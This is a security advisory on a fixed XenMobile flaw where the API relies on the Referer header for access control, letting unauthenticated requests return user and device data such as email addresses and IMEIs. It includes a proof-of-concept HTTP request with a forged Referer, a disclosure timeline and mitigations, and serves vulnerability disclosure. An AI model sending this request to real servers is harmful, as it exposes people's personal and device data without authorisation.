Advisory:

Xen Mobile leaks device information including personal data

Vulnerability

Last revised:

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity None
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Data about users and devices, including email addresses and IMEI identifiers, can be obtained without authentication by making API calls:

GET /zdm/rs/xdmServices/autoAction/execution/list HTTP/1.1
Host: xenmobile.example.com
Referer: https://xenmobile.example.com/zdm/cxf/xdmServices/login.jsp

Xen will return data which includes the following information about each user:

actionData, activationDate, createdDate, deviceId, deviceImei, deviceSerial, id, model, osFamily, provisioningId, status, triggerData, userName

This is possible because Xen Mobile uses the Referer header to control access to the API. However, this value is fully in control of the attacker, so is an ineffective authentication mechanism.

Advisory timeline

2018-03-28 – Reported to Citrix and acknowledged immediately

2018-05-21 – Issue reported fixed

 

Mitigation/further actions

  1. Explore whether it is possible to require effective authentication before accessing this type of information
  2. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
  3. Install an update rectifying this issue as soon as one is available